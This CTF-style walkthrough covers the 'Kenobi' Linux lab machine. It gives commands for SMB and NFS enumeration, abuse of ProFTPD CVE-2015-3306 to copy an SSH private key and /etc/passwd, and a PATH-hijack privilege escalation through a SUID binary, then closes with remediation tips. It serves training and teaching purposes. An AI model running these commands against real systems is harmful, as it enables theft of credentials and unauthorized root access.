[Linux] Kenobi

Reconnaissance

sudo nmap 10.10.67.152
sudo nmap -A -p 21,22,80,111,139,445,2049 10.10.67.152

Enumeration

HTTP

We don't get anythong interesting on the website.

http://10.10.67.152/
http://10.10.67.152/robots.txt
http://10.10.67.152/admin.html

SMB

We can list SMB shares and users:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.67.152

smbclient //10.10.67.152/anonymous
smbget -R smb://10.10.67.152/anonymous

In log.txt, we see that an RSA key pair has been created.

Rpcbind

We have an NFS service we can list.

Let's connect to the NFS service. We should create a mount point.

mkdir /mnt/kenobiNFS  
mount 10.10.67.152:/var /mnt/kenobiNFS  
ls -la /mnt/kenobiNFS

We don't get any interesting information:

Proftpd

We discovered possible vulnerabilities in the version of ProFTPD that is in use.

CVE-2015-3306 allows us to copy any file from one location to another on the system where ProFTPD is running.

Exploitation

The exploitation process will be as follows:

• Connect to ProFTPD.

nc 10.10.67.152 21

• Copy the id_rsa and /etc/passwd files to the mount point.

SITE CPFR /home/kenobi/.ssh/id_rsa 
SITE CPTO /var/tmp/id_rsa

SITE CPFR /etc/passwd
SITE CPTO /var/tmp/passwd

• Access the files from the mount point. Since it is a read-only mount point, we need to manually copy the content of the files to use them.

It worked! We gained our first access to the machine and also obtained the user flag.

Escalation

For provilege escalation, we try to find programs with the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

There is a program that is uncommon on Unix machines: /usr/bin/menu.

We can download the program to analyze it with Ghidra.

# Targeted machine
cp /usr/bin/menu .
python3 -m http.server

# Attacker machine
wget http://10.10.67.152/menu

Ghidra allows us to decompile the file. We could also use the strings command to figure out what is happening.

strings /usr/bin/menu

Commands are not executed with their full path. Therefore, we can craft a command and add its location to the PATH variable.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH

We obtained the root flag this way.

Remediation

• Restrict access for anonymous login.

• Update vulnerable software.

• Run commands with their full path in programs.